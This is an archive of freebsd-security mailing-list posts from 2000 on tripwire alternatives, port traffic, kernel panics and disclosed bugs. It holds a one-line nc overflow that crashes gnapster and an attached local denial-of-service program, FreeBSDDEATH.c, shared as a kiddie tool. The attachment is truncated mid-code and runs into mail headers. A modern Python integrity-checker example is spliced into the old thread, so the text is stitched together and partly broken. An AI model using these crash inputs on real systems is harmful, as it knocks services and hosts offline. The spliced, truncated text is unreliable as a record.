> gmake[3]: *** [db_file.o] Error 1
> -----------------------------------------------------

Edit src/db_file.c and change line 215 to be:

    conf->db_gzin=gzdopen(fileno((FILE *) (conf->db_in)),"rb");

and you should find that things compile.
I've had problems with the compressed database support in aide-0.7, but
uncompressed databases work as normal.

In terms of alternatives, the recent commits regarding mtree(8) are
supposed to make it usable as a tripwire alternative, but I've no direct
experience with using it as such and I can't quite recall if the changes
made it back into 4.0-STABLE yet (I think so).  There was an article on
Daemon News about using mtree to perform tripwire-like functions a couple
of issues ago, I think.

HTH.

--
Greg Lewis                    glewis@trc.adelaide.edu.au
Computing Officer             +61 8 8303 5083
Teletraffic Research Centre

From owner-freebsd-security Wed May 31 23:02:53 2000
Date: Wed, 31 May 2000 23:01:57 -0700 (PDT)
From: Todd Backman
To: Cy Schubert - ITSD Open Systems Group
Cc: Robert Gash, freebsd-security@FreeBSD.ORG
Subject: Re: Recommendations for alternative tripwire options
In-Reply-To: <200006010249.e512nGk04745@cwsys.cwsent.com>

Cy,

A PR for the addition of tripwire 1.3.1 would be great!  (In the mean time
would you mind sharing your port? ;^)

Thanks so much...
- Todd

On Wed, 31 May 2000, Cy Schubert - ITSD Open Systems Group wrote:

> In message , Robert Gash writes:
> > After reading the recent articles about the crack attempts on the
> > community LAN I am going to go ahead and deal with the hassle of
> > installing system file watching programs (like tripwire, etc.).  However,
> > as we are a commercial organization, the new copies of tripwire are not
> > free for us, and I'd like to use something in the GPL (as GPL software
> > often works better than commercial products).  I've looked around and
> > found AIDE, which appears to be a tripwire replacement written under the
> > GNU GPL.  I have only found one mention of this on the freebsd-security
> > list in the geocrawler archives, so I'll ask.
> >
> > Has anyone found any decent systems like tripwire available under the GNU
> > GPL?  I like to keep my systems pretty tight (nothing but trusted daemons
> > [FTP, Apache, openssh] running on the machines, and we don't allow any
> > users to log in, period.), but security from the inside can never hurt
> > (especially with a growing staff on the inside).  If you know of some
> > software like tripwire available under the GPL (or freely available to
> > commercial organizations), I'd love to hear from you (and perhaps some
> > others on the list as well).  I've had no success in getting AIDE to
> > compile on my 3.4-S box over here; I'll include the compile errors below.
>
> I've managed to build, install, and test aide on FreeBSD and I happen
> to like Tripwire better.  You can get 1.3 or 1.3.1 from
> tripwiresecurity.com.  As they don't have a FreeBSD product I've been
> told by a Tripwiresecurity salesman that FreeBSD users can use 1.3.1
> without restriction.  Reading the copyright I don't see any
> restriction.  I do have a locally developed port for 1.3.1.  If anyone
> wants it I could submit a PR to have it replace Tripwire 1.2 or be added
> in addition to 1.2 to the ports collection.
>
> Tripwiresecurity is talking about releasing Tripwire 2.x to open
> source; however, you'd still have to purchase the Tripwire console.
> They're not exactly sure when.
>
> On the other hand I did submit a PR with an aide 0.6 port.  I'm not
> sure what happened to it, probably still in gnats somewhere.  It would
> be trivial to update the port for 0.7.
>
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                      Fax:  (250)387-5766
> Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
> Open Systems Group, ITSD, ISTA
> Province of BC

From owner-freebsd-security Thu Jun 1 08:42:14 2000
Date: Thu, 1 Jun 2000 11:41:58 -0400 (EDT)
From: Garrett Wollman
To: Robert Gash
Cc: freebsd-security@FreeBSD.ORG
Subject: Recommendations for alternative tripwire options
Message-Id: <200006011541.LAA37965@khavrinen.lcs.mit.edu>

< said:

> Has anyone found any decent systems like tripwire available under the GNU
> GPL?

You are asking this on a FreeBSD mailing-list?  In any event, try (in
5-current and 4-stable):

	# mtree -ciK md5digest,sha1digest,ripemd160digest -p / \
	>  >my.file.list

To check, use:

	# mtree -p / <my.file.list

You will probably find a significant number of files which are expected
to change; you'll want to list these in a separate file and regenerate
the list using the `-X' option.  (You'll then also want to check the
list using the same option.)
At some point, I'll try to come up with a list which could serve as a
starting point.  Here is an example of what the specification file
looks like:

#	   user: wollman
#	machine: khavrinen.lcs.mit.edu
#	   tree: /
#	   date: Thu Jun  1 11:36:55 2000

# .
/set type=file uid=0 gid=0 mode=0755 nlink=1
.               type=dir nlink=24 size=1024 time=958576737.0
    .cshrc      mode=0644 nlink=2 size=653 time=958576718.0 \
                md5digest=7f38e672eedf928898b502e591f00c50 \
                sha1digest=a2bf06ffb1c8478fdf898e6b748c4f48f2fa8b72 \
                ripemd160digest=24e07e45d56f8b7eafdc48e7063f21ac2aa4de62
    .profile    mode=0644 nlink=2 size=251 time=948741779.0 \
                md5digest=5cda7079d26225afa62d327ed5675cc5 \
                sha1digest=efb1d360dc4643341466976cfaa009324a7f713b \
                ripemd160digest=7449907dda3d6ed151c1aa5ebe697ff3ace61454
[...]
    kernel      mode=0555 size=2397703 time=958575176.0 \
                md5digest=386cabf8174df13f02c447f0481723dc \
                sha1digest=6e599333455b1bd469a23ac1ea0aa7675d4cb0b2 \
                ripemd160digest=885928f0e37675bbe2bf1277b06ca743576265d4 \
                flags=schg
[rest of the specification deleted]

-GAWollman
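Wollman's mtree procedure above, as an added example written for this page (it is not FreeBSD's mtree and not his code): a small Python checker that builds a baseline, round-trips it through the spec layout his message shows, and compares the live tree against it with an -X style exclusion list. The directory tree, its file contents and the Python names are constructed for the example; it flattens paths instead of reproducing mtree's nested layout and skips the ripemd160 keyword.

```python
"""mtree(8)-style integrity check, added as an example for this thread (not FreeBSD's
mtree and not anyone's posted code). It writes and re-reads a baseline in the layout
Wollman's post shows (/set defaults, key=value pairs, backslash continuation) and checks
the live tree against it with an -X style exclusion list. Simplifications: flat relative
paths rather than mtree's nested dir/".." form; no ripemd160 (not always in hashlib)."""
import fnmatch
import hashlib
import os
import shutil
import stat
import tempfile

KEYWORDS = ("mode", "size", "md5digest", "sha1digest")  # compared, named as in the post


def build_spec(root):
    """Walk root; return {relative path: keyword values} for every regular file."""
    spec = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not os.path.isfile(full) or os.path.islink(full):
                continue
            with open(full, "rb") as fh:
                data = fh.read()
            spec[os.path.relpath(full, root)] = {  # values formatted as mtree prints them
                "mode": "%04o" % stat.S_IMODE(os.stat(full).st_mode), "size": str(len(data)),
                "md5digest": hashlib.md5(data).hexdigest(),
                "sha1digest": hashlib.sha1(data).hexdigest()}
    return spec


def format_spec(spec, default_mode="0644"):
    """Render a spec as text: /set carries the default mode, entries omit keywords equal
    to a default and continue over physical lines with trailing backslashes."""
    lines = ["# constructed mtree-style specification", "/set type=file mode=" + default_mode]
    for path in sorted(spec):
        kv = spec[path]
        head = path if kv["mode"] == default_mode else "%s mode=%s" % (path, kv["mode"])
        lines.append("%s size=%s \\" % (head, kv["size"]))
        lines.append("    md5digest=%s \\" % kv["md5digest"])
        lines.append("    sha1digest=%s" % kv["sha1digest"])
    return "\n".join(lines) + "\n"


def parse_spec(text):
    """Parse the text form back into {path: keywords}, honouring /set and /unset."""
    spec, defaults, pending = {}, {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):  # the entry continues on the next physical line
            pending.append(line[:-1].strip())
            continue
        pending.append(line)
        fields, pending = " ".join(pending).split(), []
        if not fields or fields[0].startswith("#"):
            continue
        pairs = [f.split("=", 1) for f in fields[1:] if "=" in f]
        if fields[0] == "/set":
            defaults.update(pairs)
        elif fields[0] == "/unset":
            defaults = {k: v for k, v in defaults.items() if k not in fields[1:]}
        else:
            spec[fields[0]] = dict(defaults, **dict(pairs))
    return spec


def check(root, spec, exclude=()):
    """Compare root against a baseline; exclude holds fnmatch patterns (as given to -X).
    Returns sorted 'path: finding' strings."""
    current, findings = build_spec(root), []
    for path in sorted(set(spec) | set(current)):
        if any(fnmatch.fnmatch(path, pat) for pat in exclude):
            continue
        if path not in current:
            findings.append(path + ": missing")
        elif path not in spec:
            findings.append(path + ": extra")
        else:
            changed = [k for k in KEYWORDS if k in spec[path] and spec[path][k] != current[path][k]]
            if changed:
                findings.append("%s: changed %s" % (path, ",".join(changed)))
    return findings


def demo():
    """Constructed scenario: baseline a small tree, tamper with it, then verify."""
    root = tempfile.mkdtemp()

    def put(rel, data, mode=0o644):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
        os.chmod(full, mode)

    put("bin/login", b"ELF login binary (constructed)", 0o755)
    put("etc/passwd", b"root:*:0:0::/root:/bin/sh\n")
    put("var/log/messages", b"May 31 12:44 kernel: boot\n")
    baseline = parse_spec(format_spec(build_spec(root)))  # round trip through the text form
    put("bin/login", b"ELF login binary (CONSTRUCTED)", 0o755)  # same size, new digests
    put("etc/passwd", b"root:*:0:0::/root:/bin/sh\nx::0:0::/:/bin/sh\n")  # size and digests
    put("var/log/messages", b"May 31 12:44 kernel: boot\nJun  1 09:00 login\n")  # excluded
    put("tmp/unexpected.bin", b"not in the baseline")
    findings = check(root, baseline, exclude=["var/log/*"])
    shutil.rmtree(root)
    return findings
```

The bin/login case is the one a size-only check misses: the file keeps its size and mode and only the digests differ, which is why the post computes digests rather than trusting metadata.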
From owner-freebsd-security Thu Jun 1 18:23:37 2000
Date: Thu, 01 Jun 2000 21:23:22 -0400
From: "Scott I. Remick"
To: freebsd-security@freebsd.org
Subject: Ports 1077 and 50419?
Message-Id: <4.3.1.2.20000601211401.0248cd90@mail.computeralt.com>

I just watched a crapload of traffic occur between a dialup user and our
FreeBSD box.  Traffic was TCP between the dialup's port 1077 and the
FreeBSD box's port 50419.  Most of the traffic was from the FreeBSD box to
the client and it pretty much flooded the connection.  Eventually it
stopped.

I did some looking around and couldn't find anything that would use those
ports.  The closest was the fake "bosniffer" which is really BO in
disguise, but from reading the way it works, this wasn't it.

I was about to blindly block those ports for lack of any other solution,
but then the traffic stopped.  So I'll check with you guys first.  Any
thoughts?

-----------------------
Scott I. Remick                  scott@computeralt.com
Network and Information          (802)388-7545 ext. 236
Systems Manager                  FAX:(802)388-3697
Computer Alternatives, Inc.
http://www.computeralt.com

From owner-freebsd-security Thu Jun 1 18:35:21 2000
Date: Thu, 1 Jun 2000 21:33:54 -0500
From: specter
To: freebsd-security@freebsd.org
Subject: gnapster dos(?)
Message-Id: <00060121355101.00534@reddog.yi.org>

Hello,

Can anyone else verify this :-

Gnapster Version : 1.3.9 & 1.3.10
Host: FreeBSD 4.0-Release, x86

>>>>>> first we do
(gdb) run
Starting program: /usr/local/bin/gnapster

>>>>>> meanwhile ....
yes "GET AAAAAAAAA...MANY As....." | nc

>>>>>> result....
Program received signal SIGSEGV, Segmentation fault.
0x8057978 in network_handle_header_complete (data=0x80e7000, source=7,
    condition=GDK_INPUT_READ) at network.c:487
487     network.c: No such file or directory.
(gdb) kill

I contacted the author about a week or two ago, received no response.
From owner-freebsd-security Thu Jun 1 18:46:31 2000
Date: Fri, 02 Jun 2000 09:47:16 +0800
From: Eugene Grosbein
Organization: SVZServ
To: "freebsd-security@FreeBSD.ORG"
Subject: No strategy for buffer
Message-ID: <39371224.99DCCEBF@svzserv.kemerovo.su>

Hello!

I post this here because my problem is flagged in the daily "security
check output".

After receiving "FreeBSD Security Advisory: FreeBSD-SA-00:19.semconfig" I
cvsup'ed my 3.4-STABLE up to the latest 3-STABLE, rebuilt and reinstalled
world and kernel, without problems.  For 2 days all was fine.  But I
received this in "security check output" this morning:

> No strategy for buffer at 0xc200fef8
> : 0xc5c6ad40: type VREG, usecount 4, writecount 0, refcount 0, flags (VOBJBUF)
>         tag VT_PROCFS, type 12, pid 13862, mode 124, flags 0
> : 0xc5c6ad40: type VREG, usecount 4, writecount 0, refcount 0, flags (VOBJBUF)
>         tag VT_PROCFS, type 12, pid 13862, mode 124, flags 0
> vnode_pager_getpages: I/O read error
> vm_fault: pager read error, pid 20442 (mc)
> pid 20442 (mc), uid 0: exited on signal 11
> pid 20462 (cvsupd), uid 2029: exited on signal 10 (core dumped)

This computer is not overclocked.
This is a Celeron 366 / 64M RAM / 256M swap.  One more thing: one day
before, cvsupd died on signal 4.  This box was running for 4 months
without a problem.  Sometimes I upgrade it to the latest 3-STABLE.

Is it a security or hardware problem, and how do I resolve this?

Eugene Grosbein

From owner-freebsd-security Thu Jun 1 23:25:58 2000
Date: Fri, 2 Jun 2000 10:25:34 +0400 (MSD)
From: "Sergey V. Mikheev"
To: freebsd-security@freebsd.org
Subject: kernel crashed

Hi!

When I try to use dd if= of=/dev/fd0 on a write-protected disc, the
system prints too many errors, panics and reboots after 15 seconds :(

I used FreeBSD 3.3-STABLE #0: Sep 15 1999

------------------------------------------------------+-----------------------+
... One child is not enough, but two are far too many.|        FreeBSD        |
                                                      |  The power to serve!  |
                   Mikheev Sergey                     |http://www.FreeBSD.org/|
                                                      +=======================+

From owner-freebsd-security Fri Jun 2 00:44:12 2000
Date: Fri, 2 Jun 2000 11:37:35 +0400
From: ark@eltex.ru
Organization: "Klingon Imperial Intelligence Service"
To: wollman@khavrinen.lcs.mit.edu
Cc: gashalot@gashalot.com, freebsd-security@FreeBSD.ORG
Subject: Re: Recommendations for alternative tripwire options
Message-Id: <200006020737.LAA15365@paranoid.eltex.spb.ru>

nuqneH,

There is a problem with mtree: it works with a plaintext database and is
*much* slower than tripwire or aide.  (YMMV)

      _ _  _ _  _ _  _
    {::} {::} {::}    CU in Hell  _| o |_ | | _|| | / _||_| |_ |_ |_
    (##) (##) (##)    /Arkan#iD   |_ o _||_| _||_| / _| | o |_||_||_|
    [||] [||] [||]    Do i believe in Bible? Hell,man,i've seen one!
From owner-freebsd-security Fri Jun 2 01:00:18 2000
Date: Fri, 02 Jun 2000 09:54:47 +0200
From: Andre Goeree
To: FreeBSD Security, helpdesk freeler, "Majordomo@FreeBSD.ORG"
Subject: Mail problems
Message-ID: <39376847.5BCFCDB@freeler.nl>

This message is not intended to be published in the freebsd-security
mailing, but an attempt to get some answers about what is going wrong
with my email.

The situation:

Since Wednesday 05/31/2000 mail is wrongly delivered to my mailbox; so
far I have counted 10 messages.
Two of these messages were sent to email addresses at my ISP.
All the other messages were sent to freebsd-security and
security@freebsd.org.
I have forwarded the messages to make sure they would arrive but still
have no clue about how they ended up in my mailbox.
Sunday 05/28/2000 I subscribed to the freebsd-security mailing list.
Yesterday I sent an email to the helpdesk of my ISP explaining the problem, but I have not yet received any reply (because yesterday was a holiday). What strikes me is that the problem occurred after I subscribed to the freebsd-security list and that most of the mail was originally sent to freebsd-security. This is also the reason why I am bringing this problem to your attention.

Do you have any idea what is going on?

Regards,
Andre Goeree

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 1:20:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8176137B8B5; Fri, 2 Jun 2000 01:20:49 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id BAA21322; Fri, 2 Jun 2000 01:20:49 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Fri, 2 Jun 2000 01:20:49 -0700 (PDT) From: Kris Kennaway To: Andre Goeree Cc: FreeBSD Security , helpdesk freeler Subject: Re: Mail problems In-Reply-To: <39376847.5BCFCDB@freeler.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 2 Jun 2000, Andre Goeree wrote:

> This message is not intended to be published in the freebsd-security
> mailing, but an attempt to get some answers about what is going wrong
> with my email.

Hmm, then sending it to freebsd-security was probably a bad idea :-)

> Since Wednesday 05/31/2000 mail is wrongly delivered to my mailbox; so
> far I have counted 10 messages.
> Two of these messages were sent to email addresses at my ISP.
> All the other messages were sent to freebsd-security and
> security@freebsd.org.
> I have forwarded the messages to make sure they would arrive but still

Err, that's how email works. Welcome to the Internet :-)

Kris

----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 4:55:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 7CEE937B69E for ; Fri, 2 Jun 2000 04:55:41 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id IAA24368; Fri, 2 Jun 2000 08:52:29 -0300 (GMT) From: Fernando Schapachnik Message-Id: <200006021152.IAA24368@ns1.via-net-works.net.ar> Subject: Re: gnapster dos(?) In-Reply-To: <00060121355101.00534@reddog.yi.org> from specter at "Jun 1, 0 09:33:54 pm" To: ai32@drexel.edu (specter) Date: Fri, 2 Jun 2000 08:52:29 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

If I'm not wrong this was published in bugtraq a while ago...

Regards!

In an earlier message, specter wrote:
> Hello,
>
> Can anyone else verify this :-
>
> Gnapster Version : 1.3.9 & 1.3.10
> Host: FreeBSD 4.0-Release, x86

Fernando P. Schapachnik
Network administration
VIA NET.WORKS ARGENTINA S.A.
fernando@via-net-works.net.ar
(54-11) 4323-3333

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 5: 9:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A3B3337BE5F; Fri, 2 Jun 2000 05:09:45 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id OAA59915; Fri, 2 Jun 2000 14:09:16 +0200 (CEST) (envelope-from des@flood.ping.uio.no) To: Andre Goeree Cc: FreeBSD Security , helpdesk freeler , "Majordomo@FreeBSD.ORG" Subject: Re: Mail problems References: <39376847.5BCFCDB@freeler.nl> From: Dag-Erling Smorgrav Date: 02 Jun 2000 14:09:16 +0200 In-Reply-To: Andre Goeree's message of "Fri, 02 Jun 2000 09:54:47 +0200" Message-ID: Lines: 9 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Andre Goeree writes:
> Do you have any idea what is going on?

Yes - you're receiving mail from the freebsd-security list, as you requested. What did you think "subscription" meant?
DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 2 6: 3: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 9B0FD37B540 for ; Fri, 2 Jun 2000 06:02:58 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 7362 invoked by uid 1021); 2 Jun 2000 13:09:06 -0000 Mail-Followup-To: freebsd-security@freebsd.org Date: Fri, 2 Jun 2000 14:09:06 +0100 From: User Datagram Protocol To: freebsd-security@freebsd.org Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Message-ID: <20000602140906.I70438@closed-networks.com> Reply-To: User Datagram Protocol Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="nOM8ykUjac0mNN89" Content-Transfer-Encoding: 8bit X-Mailer: Mutt 1.0.1i X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks Limited, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--nOM8ykUjac0mNN89
Content-Type: text/plain; charset=us-ascii

Yo,

This seems to be doing the rounds with the script kiddies fairly quickly. I've attached it. (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped by some skr1pt k1dd1es on irc)

vnode_pager_putpages() only does this check against the return value of VOP_PUTPAGES():

    rtval = VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0);
    if (rtval == EOPNOTSUPP) {

And vnode_pager_generic_putpages() appears to force the return value for all page writes that it does to VM_PAGER_OK even when an error occurs in VOP_WRITE().

The above is based on a quick inspection of the 4.0-STABLE fork source tree. So, this guy has a point.
Apologies if this issue was posted to any other lists, but it came my way, I am not currently on bugtraq due to some mail issues, and it looks like something we should be aware of (albeit really a quality of implementation issue that gets hit during times of high load - like something else I have in the pipeline. Heh.)

Regards
--
Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer
WWW: www.closed-networks.com/~udp
Dundee www.packetfactory.net/~udp
United Kingdom email: udp@closed-networks.com

--nOM8ykUjac0mNN89
Content-Type: text/plain
Content-Disposition: attachment; filename="FreeBSDDEATH.c.txt"
Content-Transfer-Encoding: 8bit

/*
From: Oleg Derevenetz
Date: Wed, 31 May 2000 19:04:12 +0400
Subject: mmap
Message-ID: <959790285@p4.f3.n5025.z2.ftn>

Draft English translation: in vnode_pager.c there is no check for errors on write of dirty mmap'ed pages to disk. If there is not enough space or any other I/O error occurs, the results will be very bad.

It will be good to kill the calling process, but it's hard to find out the owner of the offending page.

The thing is that vnode_pager.c provides no error handling at all when dirty mmap'ed file pages are flushed to disk and there is not enough space on the disk for the flush (or, really, on any I/O error), and this leads to very bad results. About six months ago I corresponded with people from freebsd.hackers; by and large they just brushed me off. The VM is built crookedly enough that I have not yet managed to come up with a response to this problem. It would be desirable to kill the process, but extracting information about which process owns the page whose flush failed is quite difficult. So here I sit, racking my brains over what to do... By the way, is anyone here working on the kernel VM?
*/

#include
#include
#include
#include
#include
#include

#define COUNT 1024*1024
#define SIZE 10*1024*1024

int main () {
    int i,j,fd;
    char *fptr, fname [16];

    for (i=0;i

; Fri, 2 Jun 2000 06:35:06 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA03295 for ; Fri, 2 Jun 2000 06:35:05 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda03293; Fri Jun 2 06:35:03 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA05161 for ; Fri, 2 Jun 2000 06:35:03 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdwe5156; Fri Jun 2 06:34:13 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e52DYCk53611 for ; Fri, 2 Jun 2000 06:34:12 -0700 (PDT) Message-Id: <200006021334.e52DYCk53611@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdw53607; Fri Jun 2 06:33:55 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: freebsd-security@freebsd.org Subject: Re: ports/18964: New Tripwire 1.3.1 Port (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 02 Jun 2000 06:33:54 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

For those of you looking for the port, here it is.
Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message Return-Path: cschuber@osg.gov.bc.ca Delivery-Date: Fri Jun 2 06:32:13 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e52DWCY53593 for ; Fri, 2 Jun 2000 06:32:12 -0700 (PDT) Received: from passer9.cwsent.com(10.2.2.2), claiming to be "passer.osg.gov.bc.ca" via SMTP by cwsys9.cwsent.com, id smtpdv53591; Fri Jun 2 06:32:05 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA05151 for ; Fri, 2 Jun 2000 06:32:03 -0700 (PDT) Resent-Message-Id: <200006021332.GAA05151@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdrs5142; Fri Jun 2 06:31:03 2000 Delivery-Date: Fri, 02 Jun 2000 06:31:03 -0700 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA05134 for ; Fri, 2 Jun 2000 06:31:03 -0700 (PDT) Received: from point.osg.gov.bc.ca(142.32.102.44) via SMTP by passer.osg.gov.bc.ca, id smtpdxM5130; Fri Jun 2 06:30:05 2000 Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA03284 for ; Fri, 2 Jun 2000 06:30:05 -0700 Received: from hub.FreeBSD.ORG(204.216.27.18) via SMTP by point.osg.gov.bc.ca, id smtpda03282; Fri Jun 2 06:30:04 2000 Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ACEB837B8A5 for ; Fri, 2 Jun 2000 06:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA78759; Fri, 2 Jun 2000 06:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Fri, 2 Jun 2000 06:30:03 -0700 (PDT) Message-Id: <200006021330.GAA78759@freefall.freebsd.org> To: Cy.Schubert@uumail.gov.bc.ca From: gnats-admin@FreeBSD.org Subject: Re: ports/18964: New 
Tripwire 1.3.1 Port Reply-To: gnats-admin@FreeBSD.org, freebsd-ports@FreeBSD.org In-Reply-To: Your message of Fri, 2 Jun 2000 06:23:26 -0700 (PDT) <200006021323.e52DNQo53559@cwsys.cwsent.com> Sender: gnats@FreeBSD.org Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Fri, 02 Jun 2000 06:31:03 -0700 Resent-From: Cy Schubert Thank you very much for your problem report. It has the internal identification `ports/18964'. The individual assigned to look at your report is: freebsd-ports. You can access the state of your problem report at any time via this link: http://www.freebsd.org/cgi/query-pr.cgi?pr=18964 >Category: ports >Responsible: freebsd-ports >Synopsis: new tripwire-1.3.1 port >Arrival-Date: Fri Jun 02 06:30:02 PDT 2000 ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 2 6:43:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id 0051637B5D7 for ; Fri, 2 Jun 2000 06:43:32 -0700 (PDT) (envelope-from mike@sentex.ca) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id JAA82237 for ; Fri, 2 Jun 2000 09:42:57 -0400 (EDT) (envelope-from mike@sentex.ca) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id JAA04560 for ; Fri, 2 Jun 2000 09:42:57 -0400 (EDT) Message-Id: <3.0.5.32.20000602093923.0309ed60@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Fri, 02 Jun 2000 09:39:23 -0400 To: freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) In-Reply-To: <20000602140906.I70438@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: 
owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 02:09 PM 6/2/00 +0100, User Datagram Protocol wrote:
>This seems to be doing the rounds with the script kiddies fairly quickly.
>I've attached it.
>(originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped
>by some skr1pt k1dd1es on irc)

Using the following login class

safe:\
    :copyright=/etc/COPYRIGHT:\
    :welcome=/etc/motd:\
    :setenv=MAIL=/var/mail/$,BLOCKSIZE=K,FTP_PASSIVE_MODE=YES:\
    :path=/sbin /bin /usr/sbin /usr/bin /usr/games /usr/local/sbin /usr/local/bin /usr/X11R6/bin ~/bin:\
    :nologin=/var/run/nologin:\
    :cputime=unlimited:\
    :datasize=64M:\
    :stacksize=8M:\
    :memorylocked=64M:\
    :memoryuse=64M:\
    :filesize=64M:\
    :coredumpsize=64M:\
    :openfiles=32:\
    :maxproc=32:\
    :priority=0:\
    :ignoretime@:\
    :umask=022:

and running the attached program does not seem to have any effect under 4.0-STABLE

FreeBSD 4.0-STABLE #0: Thu Jun 1 10:05:47 EDT 2000 ...

Or has this problem been fixed recently ?

---Mike
------------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications mike@sentex.net
Cambridge, Ontario Canada www.sentex.net

